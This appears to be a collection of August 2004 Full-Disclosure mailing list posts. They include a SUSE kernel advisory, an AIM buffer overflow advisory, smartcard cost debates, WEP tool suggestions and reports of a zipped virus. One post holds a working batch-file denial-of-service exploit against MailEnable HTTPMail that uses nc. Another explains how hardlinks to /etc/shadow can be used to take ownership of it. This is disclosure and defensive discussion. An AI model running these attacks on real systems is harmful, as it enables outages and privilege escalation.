[Full-Disclosure] SUSE Security Announcement: kernel (SUSE-SA:2004:024)
-BEGIN PGP SIGNED MESSAGE- __ SUSE Security Announcement Package:kernel Announcement-ID:SUSE-SA:2004:024 Date: Monday, Aug 9th 2004 08:50 MEST Affected products: 8.0, 8.1, 8.2, 9.0, 9.1 SUSE Linux Database Server, SUSE eMail Server III, 3.1 SUSE Linux Enterprise Server 7, 8, 9 SUSE Linux Firewall on CD/Admin host SUSE Linux Connectivity Server SUSE Linux Office Server Vulnerability Type: local privilege escalation Severity (1-10):6 SUSE default package: yes Cross References: CAN-2004-0415 Content of this advisory: 1) security vulnerability resolved: - race condition in file offset pointer handling problem description 2) solution/workaround 3) special instructions and notes 4) package location and checksums 5) pending vulnerabilities, solutions, workarounds: - gaim - mozilla/firebird 6) standard appendix (further information) __ 1) problem description, brief discussion Paul Starzetz from iSEC informed us about a race condition in the 64bit file offset handling code of the kernel. The file offset pointer (f_pos) is changed during reading, writing, and seeking through a file to point to the current position in a file. The Linux kernel offers a 32bit and a 64bit API. Unfortunately the value conversion between this two APIs as well as the access to the f_pos pointer is defective. These bugs can be abused (mostly with entries in /proc) by a local attacker to gain access to uninitialized kernel memory which may contain sensitive information (root password and alike). Additionally a bug in the implementation of chown(2) for updating inode times, and a denial-of-service condition that can occur while handling signals was fixed. (Please note that the latter patch can cause problems by leaving zombie processes. We are working on a fix.) 2) solution/workaround The is no workaround known for this problem. Please install the update package for the kernel on your system. 3) special instructions and notes SPECIAL INSTALL INSTRUCTIONS: == The following paragraphs will guide you through the installation process in a step-by-step fashion. The character sequence marks the beginning of a new paragraph. In some cases, the steps outlined in a particular paragraph may or may not be applicable to your situation. Therefore, please make sure to read through all of the steps below before attempting any of these procedures. All of the commands that need to be executed are required to be run as the superuser (root). Each step relies on the steps before it to complete successfully. Note: The update packages for the SuSE Linux Enterprise Server 7 (SLES7) are being tested at the moment and will be published as soon as possible. Step 1: Determine the needed kernel type Please use the following command to find the kernel type that is installed on your system: rpm -qf /boot/vmlinuz Following are the possible kernel types (disregard the version and build number following the name separated by the - character) k_deflt # default kernel, good for most systems. k_i386# kernel for older processors and chipsets k_athlon # kernel made specifically for AMD Athlon(tm) family processors k_psmp# kernel for Pentium-I dual processor systems k_smp # kernel for SMP systems (Pentium-II and above) k_smp4G # kernel for SMP systems which supports a maximum of 4G of RAM kernel-64k-pagesize kernel-bigsmp kernel-default kernel-smp Step 2: Download the package for your system Please download the kernel RPM package for your distribution with the name as indicated by Step 1. The list of all kernel rpm packages is appended below. Note: The kernel-source package does not contain a binary kernel in bootable form. Instead, it contains the sources that the binary kernel rpm packages are created from. It can be used by administrators who have decided to build their own kernel. Since the kernel-source.rpm is an installable (compiled) package that contains sources for the linux kernel, it is not the source RPM for the kernel RPM binary packages. The kernel RPM binary packages for the distributions can be found at the locations below
Re: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards
I am going to start singing that old song from some movie made before my time of "Nice Work if you can get it, and you can get it if you try..." off course I think the crooner was crooning about romance, easier to convince some human that it is worth some bucks to get rather than random numbers which are everywhere if you look, eh?, yeah, right?;) said with a sneer (giggle;) More seriously I was looking to RFID systems vis a vis the privacy orries of such and such systems and I wondered what would a store, ora library want with something that with effort could tell you everywhere it has been. Now I admit when I have misplaced two books I really somedays want a "magic wand" to find them. The other problem is I have seen my local library try to handle its security concerns and somethings seem reasonable to me, many seem being a bit overcautious after being burnt. I know the legends involved, when I mention I am trying to solve some problem I am told I just need an 11 year old to do it for me, as if they are pixies with magic power. Getting your staff which is dedicated in the case of the library, but which is dedicated but which several techoquestioning? (giggle trying to be polite) people on it, but which is sensitive to privacy concerns. Versus the people at the Long's Drug Chain (Medium Sized US Drug Chain) where there is a big taa-doo at the register to check everything out whenever I bring in an item that I was overcharged $3.00 for. I look at some of the more elaborate security systems that merchants have been sold as being good and I am ready at least emotionally to join the "number of the beast" worry-worts. I hope the Long's main office when presented with a new security plan looks at it and laugh's and says it is too expensive. But I am sure that someone has told some ubermanager far away from Watsonville California that "Your Shrinkage Problems will dissappear if you install our $5MEgabuck systemwhich if you look at it per item, it is not that expensive" Of course the guy selling it is far distant again from the techies who produced to earn their daily bread to pay for living in the $1000US/mo apartment. The salescreature thinks the idea of selling random numbers at $25.00 for a couple hundred is a good thing. I mean they say: "Those are magic numbers they are produced by complicated software written by people who are so bright." You get my drift. Have Fun, Sends Steve P.S. The "they lock when you take them beyond the parking lot " shopping carts have become great playtoys for kids in the neighborhood who like to overpower them and hear them beep as they drag it along like a relcalitrant puppy. Curt Sampson wrote: On Fri, 6 Aug 2004, Dana Hudes wrote: On Fri, 6 Aug 2004 [EMAIL PROTECTED] wrote: RSA has been doing PIN cards for ages...I don't get the hangup on SmartCards vs "plain old" something you have/something you know two factor as I understand it a "PIN Card" is a card with an EEPROM on it that contains a PIN. Possibly encrypted but its the same effect as any other file. The host decides if the PIN matches. The RSA SecurID system is a hardware token that generates a new number every minute using a sequence generator and a seed that is effectively a shared secret between the hardware token and the authentication server. You take the current minute's number and, usually, some other authentication information (such as a PIN or password) and pass both of those back to the authentication server, which will then determine whether the authentication is valid. It's a bit expensive, but it works ok. RSA also sells "software tokens" which are the same thing, but as software that runs on a PC or handheld. This is particularly expensive for what you get, since the token is easily copied from the device, with no indication that it's been stolen. (At least with the hardware tokens you know when it's been stolen.) And it's also quite expensive: they charge $25-$80 for a "1 year" software token. I wish I had the gall to sell large quantities of 128 bit random numbers for $25 each. cjs
RE: [Full-Disclosure] SP is here (soon) !
Got a copy of it last night. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of joe Sent: Friday, August 06, 2004 7:04 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] SP is here (soon) ! XP SP2 Final is up on MSDN Downloads for the MSDN Subscribers. English and German as of right now. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Marc Rees Sent: Friday, August 06, 2004 12:59 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] SP is here (soon) ! Go to : http://www.microsoft.com/windowsxp/downloads/updates/sp2/cdorder/en_us/defau lt810.mspx I m french. So i select France in country section. And select Windows XP SP french CD in language section. Last click on Order now. Microsoft VBScript compilation error '800a03f6' Expected 'End' ?, line 0' Someone needs SP3 ;) Marc Rees www.acbm.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] DOS@MEHTTPS
Thanks, A hotfix for this bug is available from: http://www.mailenable.com/hotfix Peter Fregon MailEnable Pty. Ltd. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of CoolICE Sent: Monday, 2 August 2004 5:19 PM To: suggest Cc: bugtraq; full-disclosure; list Subject: [Full-Disclosure] [EMAIL PROTECTED] :: :Application: MailEnable Professional HTTPMail :Vendors: http://www.mailenable.com/ :Version: 1.19 :Platforms: Windows :Bug: D.O.S :Date: 2004-07-30 :Author:CoolICE :E_mail:CoolICE#China.com :: @echo off ;if '%1'=='' echo Usage:%0 target [port]goto :eof ;set PORT=8080 ;if not '%2'=='' set PORT=%2 ;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe echo Need nc.exegoto :eof ;DEBUG %~s0 ;GOTO :run e 100 GET / HTTP/1.0 0D 0A Content-Length: [EMAIL PROTECTED]0x64 f 120 183 39 e 184 0d 0a 0d 0a rcx 8c nhttp.tmp w q :run nc %1 %PORT% http.tmp del http.tmp ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] waa waa (was Finally the truth slips out)
[EMAIL PROTECTED] wrote: On Fri, 06 Aug 2004 15:39:45 CDT, John Creegan [EMAIL PROTECTED] said: I thought this list was originally meant to focus primarily on computer hardware/software types of security issues. Malware, discovered exploitables, etc OK, you need a tie-in to computers? Go read up on CALEA and friends, and remember that just because the Clipper chip got shot down doesn't mean they won't try again I guess if that's the case (limiting this list to exploits and such), we should then ban talking about social engineering from the list. And everyone knows that that has *nothing* to do with security! :) (note the sarcasm) -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] WEP utilities
I am trying to find a WEP utility for Intrusion detection Network probing. I currently do not have Linux deployed or a competent enough grasp of Linux to use tool in Linux. What I am looking for is any tools that will do WEP decryption as well as Packet sniffing on WLAN. I need this utility to work under Windows (any version) Does anyone know of a utility that meets this criteria. Thanks, Thomas Simmons Server Support
RE: [Full-Disclosure] WEP utilities
I would guess you are doing this for security purposes. If you are going to test things to stay secure, then test what would be used against you (most likely). What is KNOPPIX? KNOPPIX is a bootable CD with a collection of GNU/Linux software, automatic hardware detection, and support for many graphics cards, sound cards, SCSI and USB devices and other peripherals. KNOPPIX can be used as a Linux demo, educational CD, rescue system, or adapted and used as a platform for commercial software product demos. It is not necessary to install anything on a hard disk. Due to on-the-fly decompression, the CD can have up to 2 GB of executable software installed on it. www.knoppix.com www.knoppix-std.org http://www.moser-informatik.ch/ Using a linux bootable CD will help you learn Linux without knowing how to configure it. Try Airsnort (on the fly WEP decryption), Kismet for wireless detection, Ethereal for packet sniffing. No need to install software, your work computer will be untouched after you are done. Note I had a Cisco error when running Kismet with Knoppix 3.4 3.3 worked great and I still use it. The newest version of 3.4 may have fixed the issue however. -Todd -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Simmons, Thomas Sent: Monday, August 09, 2004 7:59 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] WEP utilities I am trying to find a WEP utility for Intrusion detection Network probing. I currently do not have Linux deployed or a competent enough grasp of Linux to use tool in Linux. What I am looking for is any tools that will do WEP decryption as well as Packet sniffing on WLAN. I need this utility to work under Windows (any version) Does anyone know of a utility that meets this criteria. Thanks, Thomas Simmons Server Support
RE: [Full-Disclosure] WEP utilities
Title: Message Try airmagnet (www.airmagnet.com) Commercial version, but very good... You have an option to give him the Wep key, in order to let him do the job.. Don't know free products for this (out of the box), but you could probably try to have some different tools working together (Snort, etc..) Regards, Max -Original Message-From: Simmons, Thomas [mailto:[EMAIL PROTECTED] Sent: lundi 9 août 2004 14:59To: [EMAIL PROTECTED]Subject: [Full-Disclosure] WEP utilities I am trying to find a WEP utility for Intrusion detection Network probing. I currently do not have Linux deployed or a competent enough grasp of Linux to use tool in Linux. What I am looking for is any tools that will do WEP decryption as well as Packet sniffing on WLAN. I need this utility to work under Windows (any version) Does anyone know of a utility that meets this criteria. Thanks, Thomas Simmons Server Support Visit our website! http://www.nbb.be"DISCLAIMER: The content of this e-mail message should not be construed as binding on the part of the National Bank of Belgium (NBB) unless otherwise and previously stated. The opinions expressed in this message are solely those of the author and do not necessarily reflect NBB viewpoints, particularly when the content of this message, or part thereof, is private by nature or does not fall within the professional scope of its author."
RE: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards
Why yes Lyal, it is... Mea culpa...but: TCO is not as simple as you lay it out for your smartcard either. We were apples-to-apples there for a bit...but, let's drive into your purported TCO costs on the smartcard there, shall we? First, you seem to have no back-end administration (this is a self-maintained model you have? please explain how that works) to deal with lost cards, forgotten PINs, failed/trashed hardware, etc. Additionally, in any reasonably sized enterprise, you'll need resources allocated to handle new hires, machine moves, upgrades, etc. If you intend to cost-burden the existing staff that's fine...but it's still there. System integration? You're telling me your smartcard system has none? Unless you just have your system doing authentications at boot, you most certainly do have intergration. If you intend to secure some environments more than others, like, at the application level, you have the same integration issues with either system (and probably worse with yours, as RSA has been banging around at this a long time, and the list of apps that RSA can bolt onto is extensive)...so let's call that a wash too. So let's jack your per-seat price up accordingly, ok? But you know, tell you what, let's leave your TCO where it is and bear in mind that I was responding to a $1000/seat number from you, not the $210 + consultant you just tossed back. (Sorry if this sounds sarcastic, but you've changed the parameters and ommited factors as important to the TCO as I did, and then lowered your number just to sound more cost-effective...not cricket, old boy) Now, let's take a look at a typical RSA solution, street prices, for 250 users, and remember that the cost scales down from here: server software (w/24x7 support), about $20,000 US server hardware (trivial, but let's toss a couple of blades at it just for fun) $10,000 US Cards (generous here, very) @ $70.00 US X 250 = $17,500 US I'm going to burden my existing staff with back-end support and admin, just like you did. So, we have a per-seat, fully burdened TCO of $190/seat In a mobile workforce there are additional benefits as well, Lyal...like not having laptop users lug around a card reader that they have to a) remember, and b) plug in every time they want to use the PC. You may well respond by saying that's trivial...but then, you aren't the user, he won't say that. The easier we can make his use of secure products and systems the more likely he is to use them, would you agree? Bart Lansing Manager, Desktop Services Kohl's IT Lyal Collins [EMAIL PROTECTED] wrote on 08/08/2004 02:32:15 AM: $10 smartcard $200 reader (with pinpad) $500-$1000 to have someone (at consultant dates) spend up to a day installing the necessary proprietary drivers, install batteries (or AC adapter/plugpacks, because Smartcards can require more power than a serial port, particularly when just inserted and training the (typically non-techo) user on how to use the PINpad. Then 2-3 years later, repeating the whole process again because they upgraded/rebeuilt their machine, and can't get the proporietary drivers to talk to the proprietary reader w/PINpad, or to repalce the batteries etc. One-time token are so much cheaper, and $120-$150 AUD (about US$80) plus $10-$25k for the server software, and a bunch of people time deistributing the right token to the right person, plus system integration etc. Sorry if this sounds sarcastic, but the cost of ownership issue is way more complex than just the device unit cost. Lyal -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Friday, 6 August 2004 11:54 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards Guys... RSA has been doing PIN cards for ages...I don't get the hangup on SmartCards vs plain old something you have/something you know two factor http://www.rsasecurity.com/node.asp?id=1311 Cost of entry/ownership is nothing remotely close to the $1000 you mention Lyal...in fact, it's under 1/10 of that on a per seat basis... Why get hung up on it being a smartcard, when you can do two factor with a much lower entry cost and do it, frankly, easier? Bart Lansing Manager, Desktop Services Kohl's IT [EMAIL PROTECTED] wrote on 08/05/2004 08:45:33 PM: This exposure, of PIN compromise, is genric in all smartcard products today, unless a dedicated PINpad or biometric-sensor equipped readers are used - putting cost of ownership towards $1000 in some cases. PC/SC doesn't help - as a data interfcae API spec, it excludes human interface aspects. STIP (Small Terminal Interoperability Platform at www.stip.org) moves in this direction, but has evolved into many variants to interoperate with proprietary vendors and proprietary industry standards. The
Re: [Full-Disclosure] WEP utilities
Simmons, Thomas wrote: I am trying to find a WEP utility for Intrusion detection Network probing. I currently do not have Linux deployed or a competent enough grasp of Linux to use tool in Linux. What I am looking for is any tools that will do WEP decryption as well as Packet sniffing on WLAN. I need this utility to work under Windows (any version) Does anyone know of a utility that meets this criteria. Thanks, Thomas Simmons Server Support There are attempts to port airsnort onto the windoze platform http://airsnort.shmoo.com/ Joshua has also released a windoze version of his As-leap, if you are into cisco leap cracking. Apart from that, there are several commercial tools that can partially do the stuff you are enquiring about. If you find Linux too difficult to use, why not give Mac a try? ;) Kismac is pretty good and has a nice and fluffy GUI too. -- Respectfully, Konstantin V. Gavrilenko Arhont Ltd - Information Security web:http://www.arhont.com http://www.wi-foo.com e-mail: [EMAIL PROTECTED] tel: +44 (0) 870 44 31337 fax: +44 (0) 117 969 0141 PGP: Key ID - 0x4F3608F7 PGP: Server - keyserver.pgp.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Anyone know IBM's security address? + Google Hack
* Aaron Gray: It turns out I was going about the process of vulnerability notification all wrong. I should have gone to the United States Computer Emergency Readiness Team to report them. The US-CERT home page provides an email address [EMAIL PROTECTED] for reporting vulnerabilities. If you use it, you will receive more detailed instructions on how to complete this form. Before submitting *anything* to CERT/CC, be sure to review their information sharing policies. Last time I checked, their documented policy was to share _everything_ with paying customers unless you explicitly requested that information is dealt with on a need-to-know basis. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] iDEFENSE Security Advisory 08.09.04: AOL Instant Messenger aim:goaway URI Handler Buffer Overflow Vulnerability
AOL Instant Messenger aim:goaway URI Handler Buffer Overflow Vulnerability iDEFENSE Security Advisory 08.09.04 www.idefense.com/application/poi/display?id=121type=vulnerabilities August 9, 2004 I. BACKGROUND AOL Instant Messenger is an instant messaging client developed by America Online. II. DESCRIPTION Remote exploitation of a buffer overflow vulnerability in America Online Inc.'s Instant Messenger (AIM) can allow attackers to execute arbitrary code. The vulnerability specifically exists due to insufficient bounds checking on user-supplied values passed to the 'goaway' function of the AOL Instant Messenger 'aim:' URI handler. A long message buffer will overwrite values stored on the stack and may be used to overwrite a Structured Exception Handler (SEH) pointer as shown below: 0012E634 45454545 0012E638 46464646 0012E63C 47474747 0012E640 484808EB Pointer to next SEH record 0012E644 41414141 SE handler Control of the SEH pointer allows for eventual execution of arbitrary code. III. ANALYSIS Exploitation allows remote attackers to execute arbitrary code under the privileges of the user that instantiated the vulnerable version of AOL Instant Messenger. While AIM 5.5 and later has been compiled with Microsoft Visual Studio .NET 2003 and incorporates stack protection, iDEFENSE has confirmed that exploitation is still possible. IV. DETECTION iDEFENSE has confirmed that AOL Instant Messenger, version 5.5, is vulnerable. Previous versions are also suspected as vulnerable. V. WORKAROUND Exploitation of 'aim:' URI handler vulnerabilities can be prevented by removing the following key from the registry: HKEY_CLASSES_ROOT\aim The following script can be saved to a file with the .vbs extension and executed to automate the task of removing the relevant URI handler: Set WshShell = CreateObject(WScript.Shell) WshShell.RegDelete HKCR\aim\ VI. VENDOR RESPONSE iDEFENSE has been working with AOL since 07/12/2004 regarding this issue to allow the vendor time to implement a patch. However, on 08/09/2004 an advisory was released by Secunia (http://secunia.com/advisories/12198/) as the same issue was discovered by another group of researchers. With the issue is now public, iDEFENSE is proceeding with public disclosure. AOL has provided the following statement: iDEFENSE, Inc. reported a buffer overflow vulnerability in all Windows versions of AOL Instant Messenger (AIM). The impact of this vulnerability could potentially allow for an attacker to execute malicious code on Windows platforms. Exploit of this vulnerability requires that an AIM user click on a malicious URL supplied in an instant message or embedded in a web page. Affected Products and Applications AOL Instant Messenger (AIM) for Windows - All known versions Vendor Recommendations 1. America Online, Inc. recommends that Windows users of AIM upgrade to the latest beta version to be released on August 9, 2004. This new version of AIM addresses the vulnerability described herein and can be obtained via the AOL Instant Messenger portal, www.aim.com. 2. A workaround provided by iDEFENSE is available until users are able to upgrade to the new beta version. Vendor Acknowledgments Thanks to Matt Murphy and iDEFENSE, Inc. for their assistance to responsibly address this issue. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2004-0636 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/16/2004 Initial vendor contact 06/16/2004 iDEFENSE clients notified 07/07/2004 Secondary vendor contact 07/12/2004 Initial vendor response 08/09/2004 Coordinated public disclosure IX. CREDIT Matt Murphy is credited with this discovery. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp X. LEGAL NOTICES Copyright (c) 2004 iDEFENSE, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] WEP utilities
Oh, BTWsome wireless cards wont work with these linux bootable disco. That could be a problem for ya. But if you can get them to work, the last one has over 300 security tools built-in. Both Knoppix and Knoppix STD have Airsnort, Kismet, Ethereal, Ettercap, WEPCrack. Good stuff. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles Sent: Monday, August 09, 2004 8:53 AM To: 'Simmons, Thomas'; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] WEP utilities I would guess you are doing this for security purposes. If you are going to test things to stay secure, then test what would be used against you (most likely). What is KNOPPIX? KNOPPIX is a bootable CD with a collection of GNU/Linux software, automatic hardware detection, and support for many graphics cards, sound cards, SCSI and USB devices and other peripherals. KNOPPIX can be used as a Linux demo, educational CD, rescue system, or adapted and used as a platform for commercial software product demos. It is not necessary to install anything on a hard disk. Due to on-the-fly decompression, the CD can have up to 2 GB of executable software installed on it. www.knoppix.com www.knoppix-std.org http://www.moser-informatik.ch/ Using a linux bootable CD will help you learn Linux without knowing how to configure it. Try Airsnort (on the fly WEP decryption), Kismet for wireless detection, Ethereal for packet sniffing. No need to install software, your work computer will be untouched after you are done. Note I had a Cisco error when running Kismet with Knoppix 3.4 3.3 worked great and I still use it. The newest version of 3.4 may have fixed the issue however. -Todd -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Simmons, Thomas Sent: Monday, August 09, 2004 7:59 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] WEP utilities I am trying to find a WEP utility for Intrusion detection Network probing. I currently do not have Linux deployed or a competent enough grasp of Linux to use tool in Linux. What I am looking for is any tools that will do WEP decryption as well as Packet sniffing on WLAN. I need this utility to work under Windows (any version) Does anyone know of a utility that meets this criteria. Thanks, Thomas Simmons Server Support
[Full-Disclosure] List Charter
[Full-Disclosure] Mailing List Charter John Cartwright [EMAIL PROTECTED] and Len Rose [EMAIL PROTECTED] Introduction Purpose -- This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.netsys.com. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by Len Rose and John Cartwright. Subscription Information Subscription/unsubscription may be performed via the HTTP interface located at http://lists.netsys.com/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to [EMAIL PROTECTED], send the word 'help' in either the message subject or body for details. Moderation Management --- The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.netsys.com/pipermail/full-disclosure/ Acceptable Content -- Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. Posting Guidelines -- The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing [EMAIL PROTECTED] Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. Charter Additions/Changes - The list charter will be published at http://lists.netsys.com/full-disclosure-charter.html In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Security hole in Confixx backup script
Hi, * Dirk Pirschel wrote on Mon, 02 Aug 2004 at 13:00 +0200: A user might use the restore funktion to change the ownership of target files to his own. The restore script runs with root privileges. It unpacks the archive, and then executes chown -R $user in the destination directory ($HOME/html or $HOME/files). Before running the restore script, an attacker can make hardlinks to files not owned by himself. The ownership of these files will be changed. On some badly administered systems there is only one disk partion, so it is possible to make a hardlink to /etc/shdadow within $HOME. -Dirk -- Linux - Life is too short for reboots pgpk15yAdCYTk.pgp Description: PGP signature
Re: [Full-Disclosure] [anti-XSS]about CERT/CC:malicious_code_mitigation
On Sat, 07 Aug 2004 06:25:00 -, bitlance winter said: #! The first function takes the negative approach. #! Use a list of bad characters to filter the data sub FilterNeg { local( $fd ) = @_; $fd =~ s/['\%\;\)\(\\+]//g; return( $fd ) ; } *BZZT!!* Wrong. Don't do this in production code, because... I have understood that bad characters are ' % ; ) ( + If it turns out that * (asterisk) is a bad character, you're screwed. If it turns out that *any other* character is bad, you're screwed. The *proper* way to do the filtering is to *remove* *all* characters not known to be good. Something like: $fd =~ s/[^-_ a-zA-Z0-9]//g; Only pass alphabetic, numeric, space, hyphen, and underscore. Add other characters *only* if you can show they are *not* a problem. pgpM0b6nejVGc.pgp Description: PGP signature
Re: [Full-Disclosure] waa waa (was Finally the truth slips out)
Appointed? If you do not believe in the U.S. constitution and the supreme court then I could see how one might suggest that Mr. Bush was appointed. If you do believe in it then you must know that his appointment was the only legal solution to the issue. Many major papers investigated the vote counting in FL and they all concluded that Mr. Bush did win if the votes were counted correctly. Never mind the thousands of military votes the Dems had thrown out which were legal. Come on people. Do your research if you are going to try and make a point. Jason wrote: I think you are just upset because it hurts your Texan Pride that the best representative of the Lone Star State is an internationally recognized tool that was effectively appointed to office. How much better would the international perception of a Texan be without that appointment? __ Do you Yahoo!? Yahoo! Mail - You care about security. So do we. http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
http://isc.sans.org/ http://www.virustotal.com/xhtml/index_en.html -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 3:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
(In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
(In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? http://www.incidents.org/diary.php?date=2004-08-09 Scan results (http://www.virustotal.com) File: price.zip Date: 08/09/2004 21:41:30 BitDefender 7.0/20040809 found [JS.Dword.dropper] ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe] eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit] F-Prot 3.15/20040809 found [HTML/[EMAIL PROTECTED] Kaspersky 4.0.2.23/20040809 found nothing McAfee 4383/20040804 found [JS/IllWill] NOD32v2 1.836/20040809 found [Win32/Bagle.AI] Norman 5.70.10/20040806 found [W32/Malware] Panda 7.02.00/20040809 found [Fichero Sospechoso] Sybari 7.5.1314/20040809 found [JS/IllWill] Symantec 8.0/20040809 found nothing TrendMicro 7.000/20040809 found [HTML_BAGLE.AC] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
